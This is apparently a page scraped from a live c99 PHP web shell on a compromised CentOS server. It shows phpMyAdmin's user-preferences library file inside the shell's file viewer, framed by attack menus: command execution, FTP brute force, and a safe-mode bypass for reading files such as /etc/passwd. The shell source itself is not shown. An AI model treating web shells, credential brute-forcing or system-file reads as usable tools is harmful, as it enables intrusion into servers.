!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/libraries/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     user_preferences.lib.php (10.41 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * Functions for displaying user preferences pages
 *
 * @package phpMyAdmin
 */

/**
 * Common initialization for user preferences modification pages
 *
 * @uses ConfigFile::getInstance()
 * @uses ConfigFile::resetConfigData()
 * @uses ConfigFile::setAllowedKeys()
 * @uses ConfigFile::setCfgUpdateReadMapping()
 * @uses ConfigFile::updateWithGlobalConfig()
 * @uses PMA_read_userprefs_fieldnames()
 */
function PMA_userprefs_pageinit()
{
    
$forms_all_keys PMA_read_userprefs_fieldnames($GLOBALS['forms']);
    
$cf ConfigFile::getInstance();
    
$cf->resetConfigData(); // start with a clean instance
    
$cf->setAllowedKeys($forms_all_keys);
    
$cf->setCfgUpdateReadMapping(array(
        
'Server/hide_db' => 'Servers/1/hide_db',
        
'Server/only_db' => 'Servers/1/only_db'));
    
$cf->updateWithGlobalConfig($GLOBALS['cfg']);
}

/**
 * Loads user preferences
 *
 * Returns an array:
 * * config_data - path => value pairs
 * * mtime - last modification time
 * * type - 'db' (config read from pmadb) or 'session' (read from user session)
 *
 * @uses $_SESSION['userconfig']
 * @uses $GLOBALS['controllink']
 * @uses PMA_array_merge_recursive
 * @uses PMA_backquote()
 * @uses PMA_DBI_fetch_single_row()
 * @uses PMA_getRelationsParam()
 * @uses PMA_sqlAddslashes()
 * @uses $GLOBALS['controllink']
 * @return array
 */
function PMA_load_userprefs()
{
    
$cfgRelation PMA_getRelationsParam();
    if (!
$cfgRelation['userconfigwork']) {
        
// no pmadb table, use session storage
        
if (!isset($_SESSION['userconfig'])) {
            
$_SESSION['userconfig'] = array(
                
'db' => array(),
                
'ts' => time());
        }
        return array(
            
'config_data' => $_SESSION['userconfig']['db'],
            
'mtime' => $_SESSION['userconfig']['ts'],
            
'type' => 'session');
    }
    
// load configuration from pmadb
    
$query_table PMA_backquote($cfgRelation['db']) . '.' PMA_backquote($cfgRelation['userconfig']);
    
$query '
        SELECT `config_data`, UNIX_TIMESTAMP(`timevalue`) ts
        FROM ' 
$query_table '
          WHERE `username` = \'' 
PMA_sqlAddslashes($cfgRelation['user']) . '\'';
    
$row PMA_DBI_fetch_single_row($query'ASSOC'$GLOBALS['controllink']);

    return array(
        
'config_data' => $row ? (array)json_decode($row['config_data']) : array(),
        
'mtime' => $row $row['ts'] : time(),
        
'type' => 'db');
}

/**
 * Saves user preferences
 *
 * @uses $_SESSION['cache'][...]['userprefs']
 * @uses $_SESSION['userconfig']
 * @uses $GLOBALS['cfg']['ServerDefault']
 * @uses $GLOBALS['controllink']
 * @uses $GLOBALS['server']
 * @uses ConfigFile::getConfigArray()
 * @uses ConfigFile::getInstance()
 * @uses PMA_backquote()
 * @uses PMA_DBI_fetch_value
 * @uses PMA_DBI_getError()
 * @uses PMA_DBI_try_query()
 * @uses PMA_Message::addMessage()
 * @uses PMA_Message::error()
 * @uses PMA_Message::rawError()
 * @uses PMA_sqlAddslashes()
 * @uses PMA_getRelationsParam()
 * @param array $config_data
 * @return true|PMA_Message
 */
function PMA_save_userprefs(array $config_array)
{
    
$cfgRelation PMA_getRelationsParam();
    
$server = isset($GLOBALS['server'])
        ? 
$GLOBALS['server']
        : 
$GLOBALS['cfg']['ServerDefault'];
    
$cache_key 'server_' $server;
    if (!
$cfgRelation['userconfigwork']) {
        
// no pmadb table, use session storage
        
$_SESSION['userconfig'] = array(
            
'db' => $config_array,
            
'ts' => time());
        if (isset(
$_SESSION['cache'][$cache_key]['userprefs'])) {
           unset(
$_SESSION['cache'][$cache_key]['userprefs']);
        }
        return 
true;
    }

    
// save configuration to pmadb
    
$query_table PMA_backquote($cfgRelation['db']) . '.' PMA_backquote($cfgRelation['userconfig']);
    
$query '
        SELECT `username`
        FROM ' 
$query_table '
          WHERE `username` = \'' 
PMA_sqlAddslashes($cfgRelation['user']) . '\'';

    
$has_config PMA_DBI_fetch_value($query00$GLOBALS['controllink']);
    
$config_data json_encode($config_array);
    if (
$has_config) {
        
$query '
            UPDATE ' 
$query_table '
            SET `config_data` = \'' 
PMA_sqlAddslashes($config_data) . '\'
            WHERE `username` = \'' 
PMA_sqlAddslashes($cfgRelation['user']) . '\'';
    } else {
        
$query '
            INSERT INTO ' 
$query_table ' (`username`, `config_data`)
            VALUES (\'' 
PMA_sqlAddslashes($cfgRelation['user']) . '\',
                \'' 
PMA_sqlAddslashes($config_data) . '\')';
    }
    if (isset(
$_SESSION['cache'][$cache_key]['userprefs'])) {
        unset(
$_SESSION['cache'][$cache_key]['userprefs']);
    }
    if (!
PMA_DBI_try_query($query$GLOBALS['controllink'])) {
        
$message PMA_Message::error(__('Could not save configuration'));
        
$message->addMessage('<br /><br />');
        
$message->addMessage(PMA_Message::rawError(PMA_DBI_getError($GLOBALS['controllink'])));
        return 
$message;
    }
    return 
true;
}

/**
 * Returns a user preferences array filtered by $cfg['UserprefsDisallow']
 * (blacklist) and keys from user preferences form (whitelist)
 *
 * @uses PMA_array_write()
 * @uses PMA_read_userprefs_fieldnames()
 * @param array $config_data path => value pairs
 * @return array
 */
function PMA_apply_userprefs(array $config_data)
{
    
$cfg = array();
    
$blacklist array_flip($GLOBALS['cfg']['UserprefsDisallow']);
    if (!
$GLOBALS['cfg']['UserprefsDeveloperTab']) {
        
// disallow everything in the Developers tab
        
$blacklist['Error_Handler/display'] = true;
        
$blacklist['Error_Handler/gather'] = true;
        
$blacklist['DBG/sql'] = true;
    }
    
$whitelist array_flip(PMA_read_userprefs_fieldnames());
    
// whitelist some additional fields which are custom handled
    
$whitelist['ThemeDefault'] = true;
    
$whitelist['fontsize'] = true;
    
$whitelist['lang'] = true;
    
$whitelist['collation_connection'] = true;
    
$whitelist['Server/hide_db'] = true;
    
$whitelist['Server/only_db'] = true;
    foreach (
$config_data as $path => $value) {
        if (!isset(
$whitelist[$path]) || isset($blacklist[$path])) {
            continue;
        }
        
PMA_array_write($path$cfg$value);
    }
    return 
$cfg;
}

/**
 * Reads user preferences field names
 *
 * @param array|null $forms
 * @return array
 */
function PMA_read_userprefs_fieldnames(array $forms null)
{
    static 
$names;

    
// return cached results
    
if ($names !== null) {
        return 
$names;
    }
    if (
is_null($forms)) {
        
$forms = array();
        include 
'libraries/config/user_preferences.forms.php';
    }
    
$names = array();
    foreach (
$forms as $formset) {
        foreach (
$formset as $form) {
            foreach (
$form as $k => $v) {
                
$names[] = is_int($k) ? $v $k;
            }
        }
    }
    return 
$names;
}

/**
 * Updates one user preferences option (loads and saves to database).
 *
 * No validation is done!
 *
 * @uses PMA_load_userprefs()
 * @uses PMA_save_userprefs()
 * @param string $cfg_name
 * @param mixed $value
 * @return void
 */
function PMA_persist_option($path$value$default_value)
{
    
$prefs PMA_load_userprefs();
    if (
$value === $default_value) {
        if (isset(
$prefs['config_data'][$path])) {
            unset(
$prefs['config_data'][$path]);
        } else {
            return;
        }
    } else {
        
$prefs['config_data'][$path] = $value;
    }
    
PMA_save_userprefs($prefs['config_data']);
}

/**
 * Redirects after saving new user preferences
 *
 * @uses ConfigFile::getConfigArray()
 * @uses ConfigFile::getInstance()
 * @uses PMA_generate_common_url()
 * @uses PMA_sendHeaderLocation()
 * @param array  $forms
 * @param array  $old_settings
 * @param string $file_name
 * @param array  $params
 * @param string $hash
 */
function PMA_userprefs_redirect(array $forms, array $old_settings$file_name$params null$hash null)
{
    
$reload_left_frame = isset($params['reload_left_frame']) && $params['reload_left_frame'];
    if (!
$reload_left_frame) {
        
// compute differences and check whether left frame should be refreshed
        
$old_settings = isset($old_settings['config_data'])
                ? 
$old_settings['config_data']
                : array();
        
$new_settings ConfigFile::getInstance()->getConfigArray();
        
$diff_keys array_keys(array_diff_assoc($old_settings$new_settings)
                + 
array_diff_assoc($new_settings$old_settings));
        
$check_keys = array('NaturalOrder''MainPageIconic''DefaultTabDatabase',
            
'Server/hide_db''Server/only_db');
        
$check_keys array_merge($check_keys$forms['Left_frame']['Left_frame'],
             
$forms['Left_frame']['Left_databases']);
        
$diff array_intersect($check_keys$diff_keys);
        
$reload_left_frame = !empty($diff);
    }

    
// redirect
    
$url_params = array(
        
'saved' => 1,
        
'reload_left_frame' => $reload_left_frame);
    if (
is_array($params)) {
        
$url_params array_merge($params$url_params);
    }
    if (
$hash) {
        
$hash '#' urlencode($hash);
    }
    
PMA_sendHeaderLocation($GLOBALS['cfg']['PmaAbsoluteUri'] . $file_name
            
PMA_generate_common_url($url_params'&') . $hash);
}

/**
 * Shows form which allows to quickly load settings stored in browser's local storage
 *
 * @uses $_REQUEST['prefs_autoload']
 * @uses $_SESSION['userprefs_autoload']
 * @uses PMA_generate_common_hidden_inputs()
 */
function PMA_userprefs_autoload_header()
{
    if (isset(
$_REQUEST['prefs_autoload']) && $_REQUEST['prefs_autoload'] == 'hide') {
        
$_SESSION['userprefs_autoload'] = true;
        exit;
    }
    
$script_name basename(basename($GLOBALS['PMA_PHP_SELF']));
    
$return_url $script_name '?' http_build_query($_GET'''&');
    
?>
    <div id="prefs_autoload" class="notice" style="display:none">
        <form action="prefs_manage.php" method="post">
            <?php echo PMA_generate_common_hidden_inputs() . "\n"?>
            <input type="hidden" name="json" value="" />
            <input type="hidden" name="submit_import" value="1" />
            <input type="hidden" name="return_url" value="<?php echo htmlspecialchars($return_url?>" />
            <?php echo __('Your browser has phpMyAdmin configuration for this domain. Would you like to import it for current session?'?>
            <br />
            <a href="#yes"><?php echo __('Yes'?></a> / <a href="#no"><?php echo __('No'?></a>
        </form>
    </div>
    <?php
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0152 ]--